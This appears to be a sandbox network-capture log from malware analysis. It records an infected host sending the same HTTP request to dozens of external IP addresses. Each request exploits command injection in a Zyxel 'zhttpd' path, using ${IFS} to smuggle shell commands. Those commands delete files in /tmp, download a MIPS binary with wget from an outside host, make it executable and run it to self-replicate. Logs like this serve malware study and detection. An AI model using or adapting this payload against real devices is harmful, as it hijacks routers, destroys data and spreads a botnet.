                                        Mar 31, 2024 09:22:14.540102005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7418192.168.2.234502869.22.181.107443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.540138960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7419192.168.2.233480858.114.49.27443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.540190935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7420192.168.2.234490623.163.231.24443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.540226936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7421192.168.2.2359048148.118.41.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.540254116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7422192.168.2.235851886.158.178.147443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.540302992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7423192.168.2.2352346187.165.28.97443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.540349960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7424192.168.2.2356770207.85.85.243443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.540380001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7425192.168.2.2333592177.69.65.225443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.540424109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7426192.168.2.2333284108.108.99.228443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.540460110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7427192.168.2.2340056145.173.119.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.540507078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7428192.168.2.234095640.47.187.207443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.540551901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7429192.168.2.2344144106.6.33.126443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.540596008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7430192.168.2.235355840.99.139.184443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.540643930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7431192.168.2.234834019.129.44.247443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.540674925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7432192.168.2.2347494124.240.71.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.540708065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7433192.168.2.233995671.123.122.144443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.540759087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7434192.168.2.235801831.192.55.84443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.540797949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7435192.168.2.236089470.28.180.48443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.540834904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7436192.168.2.2346146169.213.189.90443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.540884018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7437192.168.2.235778263.202.89.108443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.540940046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7438192.168.2.2339394190.188.35.158443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.540987015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7439192.168.2.233792212.220.198.109443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.541033983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7440192.168.2.235933270.226.37.110443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.541074991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7441192.168.2.234499040.254.142.206443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.541112900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7442192.168.2.233932087.17.237.80443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.541146994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7443192.168.2.2356802136.86.193.231443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.541201115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7444192.168.2.2342704144.241.167.221443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.541245937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7445192.168.2.234062298.198.137.41443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.541291952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7446192.168.2.2356964221.205.227.147443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.541337967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7447192.168.2.235134871.198.204.160443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.541385889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7448192.168.2.233594819.253.85.179443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.541433096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7449192.168.2.233412243.64.115.128443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.541462898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7450192.168.2.235040093.135.14.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.541492939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7451192.168.2.2336244137.176.96.254443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.541544914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7452192.168.2.2351766149.243.19.119443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.541584969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7453192.168.2.235975414.50.146.56443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.541635036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7454192.168.2.2352946138.52.37.150443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.541668892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7455192.168.2.235006819.36.203.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.541721106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7456192.168.2.2341598212.109.34.34443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.541759968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7457192.168.2.2333946129.210.124.248443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.541812897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7458192.168.2.235690232.59.192.219443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.541857004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7459192.168.2.2358582112.184.113.6443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.541882992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7460192.168.2.2343616200.183.239.201443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.541915894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7461192.168.2.234021886.175.87.200443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.541968107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7462192.168.2.233335660.50.66.142443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.542018890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7463192.168.2.234797039.68.23.157443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.542052984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7464192.168.2.2357876136.211.122.147443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.542098999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7465192.168.2.2348524116.73.140.10443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.542134047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7466192.168.2.2344564145.101.165.101443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.542185068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7467192.168.2.2354254144.98.31.233443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.542222023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7468192.168.2.235414077.212.177.245443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.542262077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7469192.168.2.2340038146.158.214.163443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.542314053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7470192.168.2.233500842.110.172.108443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.542356968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7471192.168.2.233365072.74.60.93443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.542407036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7472192.168.2.2336960160.110.147.69443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.542447090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7473192.168.2.2347076181.64.22.59443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.542485952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7474192.168.2.2353916193.192.202.118443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.542526960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7475192.168.2.234593684.95.238.169443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.542552948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7476192.168.2.2335594140.38.154.172443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.542587996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7477192.168.2.2352164136.216.66.113443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.542642117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7478192.168.2.234388649.155.195.111443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.542681932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7479192.168.2.2359600121.166.127.68443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.542725086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7480192.168.2.2350062143.201.236.38443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.542768955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7481192.168.2.235491669.141.7.186443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.542814970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7482192.168.2.235248065.58.16.219443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.542831898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7483192.168.2.2357246211.127.104.14443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.542870998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7484192.168.2.2352022204.140.138.29443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.542929888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7485192.168.2.233530091.208.70.173443
                                        TimestampBytes transferredDirectionData
